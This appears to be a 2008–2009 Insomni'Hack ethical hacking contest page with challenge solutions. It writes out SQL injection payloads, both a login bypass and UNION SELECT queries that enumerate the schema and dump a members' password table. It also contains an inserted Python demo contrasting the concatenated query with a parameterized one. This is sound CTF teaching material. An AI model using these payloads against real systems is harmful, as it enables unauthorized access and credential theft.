Insomni'hack Contest : Ethical Hacking
Insomni'Hack 09
After the success of last year's first edition, Insomni'Hack will be back in 2009. It will be held on Friday February 6th 2009.
The exact location is not yet known, but it will be somewhere in the western part of Switzerland. Additional information will be made available on this web site as soon as possible.
Get ready to measure your hacking skills against the different challenges that cover a vast area of information security in the biggest hacking contest in western Switzerland.
If you wish to register to the event, please send an email with insomnihack 09 in the subject line to :
We are looking forward to seeing you there!
Insomni'Hack 08
On 8th February 2008, SCRT organized the first ethical hacking contest in Western Switzerland.
The contest is now over.
Video excerpt
The challenges
We will present here some solutions to the challenges.
| No | Challenge name | Points | Access |
| - | - | - | - |
| 1 | Methadone | 200 | hackthis.insomni.hack/methadone |
| 6 | Highlander | 600 | begin.insomni.hack |
| 8 | Oxymore | 200 | hackthis.insomni.hack/oxymore |
| 9 | NoNo | 100 | hackthis.insomni.hack/NoNo |
| 5 | Ventriloque | 600 | www.insomni.hack/ventriloque |
| 3 | Cherche&Trouve | 1000 | www.insomni.hack/cherche&trouve |
| 2 | Héroïne | 800 | hackthis.insomni.hack/heroine |
| 7 | Cascade Scoubidou | 200 | www.insomni.hack/cascade |
| 7 | Cascade orthodoxe | 400 | www.insomni.hack/cascade |
| 7 | Cascade de chiffres | 600 | www.insomni.hack/cascade |
| 7 | Cascade old-school | 800 | www.insomni.hack/cascade |
| 10 | OUAIP | 500 | |
Challenge 1: Methadone
Simple SQL injection
OR 'x'='x made it possible to bypass the login/password protection.
Challenge 2: Héroïne
Harder SQL injection
Here are the steps to pass this challenge:
Find the right table: ' OR 'x'='x' union select table_name,table_type,table_schema from information_schema.tables where 'x'='x
Or find the right column directly: ' ' OR 'x'='x' union select table_name,column_name,table_schema from information_schema.columns where 'x'='x
SELECT * FROM hackthis_BDD.membres WHERE identifiant = 'toto' AND motpasse = '' OR 'x'='x' union select table_name,table_schema,column_name from information_schema.columns where 'x'='x'
Get the login/password: ' OR 'x'='x' union select * from membres where 'x'='x
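Both challenges succeed because the login query is assembled by string concatenation, so a quote in the password field ends the string literal and the rest is parsed as SQL. The following added example (not part of the original page or the contest's code) reproduces the login query from challenge 2 with Python's sqlite3 and shows the parameterized form treating the same inputs as plain data; the table contents, the third column name and the function names are constructed assumptions.

```python
import sqlite3

# Inputs quoted on the page for challenges 1 and 2.
BYPASS = "' OR 'x'='x"
UNION = "' OR 'x'='x' union select * from membres where 'x'='x"

def make_db():
    """In-memory stand-in for the membres table (constructed data).
    Three columns, matching the three-column UNION used on the page;
    the name of the third column is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE membres (identifiant TEXT, motpasse TEXT, role TEXT)")
    db.execute("INSERT INTO membres VALUES ('admin', 'S3cret-constructed', 'admin')")
    return db

def login_concat(db, user, password):
    """Vulnerable form: input is pasted into the SQL text.
    With BYPASS the WHERE clause becomes
    (identifiant = 'toto' AND motpasse = '') OR 'x'='x', true for every row."""
    sql = ("SELECT * FROM membres WHERE identifiant = '" + user +
           "' AND motpasse = '" + password + "'")
    return db.execute(sql).fetchall()

def login_param(db, user, password):
    """Hardened form: placeholders bind the input as values, so quotes and
    keywords inside it are compared literally and never parsed as SQL."""
    sql = "SELECT * FROM membres WHERE identifiant = ? AND motpasse = ?"
    return db.execute(sql, (user, password)).fetchall()

def run_demo():
    """Return the number of rows each login form yields for each input."""
    db = make_db()
    results = {}
    for name, pw in (("bypass", BYPASS), ("union", UNION)):
        results[name] = (len(login_concat(db, "toto", pw)),
                         len(login_param(db, "toto", pw)))
    # A legitimate login still works through the parameterized query.
    results["legit"] = len(login_param(db, "admin", "S3cret-constructed"))
    return results

if __name__ == "__main__":
    for case, rows in run_demo().items():
        print(case, rows)
```

The first number in each pair is the row count from the concatenated query, the second from the parameterized one.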
Challenge 7: Cascade
Solution to challenge 7 (Cascade) prepared by Bruno Kerouanton
